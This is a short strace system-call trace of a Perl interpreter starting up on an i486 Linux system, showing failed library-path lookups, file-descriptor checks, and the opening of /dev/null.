7725  07:20:06.763684 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfdc3f30) = -1 ENOENT (No such file or directory)

7725  07:20:06.763706 stat64("/usr/local/lib/perl/5.8.7", 0xbfdc4070) = -1 ENOENT (No such file or directory)

7725  07:20:06.763721 stat64("/usr/local/share/perl/5.8.7", 0xbfdc4070) = -1 ENOENT (No such file or directory)

7725  07:20:06.763733 stat64("/usr/local/lib/perl/5.8.6", 0xbfdc4070) = -1 ENOENT (No such file or directory)

7725  07:20:06.763745 stat64("/usr/local/share/perl/5.8.6", 0xbfdc4070) = -1 ENOENT (No such file or directory)

7725  07:20:06.763757 stat64("/usr/local/lib/perl/5.8.4", 0xbfdc4070) = -1 ENOENT (No such file or directory)

7725  07:20:06.763768 stat64("/usr/local/share/perl/5.8.4", 0xbfdc4070) = -1 ENOENT (No such file or directory)

7725  07:20:06.763780 stat64("/usr/local/lib/perl/5.8.3", 0xbfdc4070) = -1 ENOENT (No such file or directory)

7725  07:20:06.763792 stat64("/usr/local/share/perl/5.8.3", 0xbfdc4070) = -1 ENOENT (No such file or directory)

7725  07:20:06.763804 stat64("/usr/local/lib/perl/5.8.2", 0xbfdc4070) = -1 ENOENT (No such file or directory)

7725  07:20:06.763815 stat64("/usr/local/share/perl/5.8.2", 0xbfdc4070) = -1 ENOENT (No such file or directory)

7725  07:20:06.763827 stat64("/usr/local/lib/perl/5.8.1", 0xbfdc4070) = -1 ENOENT (No such file or directory)

7725  07:20:06.763839 stat64("/usr/local/share/perl/5.8.1", 0xbfdc4070) = -1 ENOENT (No such file or directory)

7725  07:20:06.763850 stat64("/usr/local/lib/perl/5.8.0", 0xbfdc4070) = -1 ENOENT (No such file or directory)

7725  07:20:06.763862 stat64("/usr/local/share/perl/5.8.0", 0xbfdc4070) = -1 ENOENT (No such file or directory)

7725  07:20:06.763885 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfdc3d68) = -1 ENOTTY (Inappropriate ioctl for device)

7725  07:20:06.763899 _llseek(0, 0, [0], SEEK_CUR) = 0

7725  07:20:06.763911 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfdc3d68) = -1 EBADF (Bad file descriptor)

7725  07:20:06.763922 _llseek(1, 0, 0xbfdc3db0, SEEK_CUR) = -1 EBADF (Bad file descriptor)

7725  07:20:06.763932 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfdc3d68) = -1 EINVAL (Invalid argument)

7725  07:20:06.763943 _llseek(2, 0, 0xbfdc3db0, SEEK_CUR) = -1 ESPIPE (Illegal seek)

7725  07:20:06.763954 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

7725  07:20:06.763967 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfdc3e28) = -1 ENOTTY (Inappropriate ioctl for device)

7725  07:20:06.763977 _llseek(1, 0, [0], SEEK_CUR) = 0

7725  07:20:06.763988 fcntl64(1, F_SETFD, FD_CLOEXEC) = 0

7725  07:20:06.764004 fstat64(1, {st_mode=S_IFCHR|0666, st_rdev=makedev(1, 3), ...}) = 0

7725  07:20:06.764022 rt_sigaction(SIGCHLD, NULL, {SIG_DFL}, 8) = 0

7725  07:20:06.764075 readlink("/proc/self/exe", "/usr/bin/perl", 4095) = 13

7725  07:20:06.764121 getppid()         = 7723

7725  07:20:06.764182 stat64("/etc/perl/IO.pmc", 0xbfdc3b1c) = -1 ENOENT (No such file or directory)

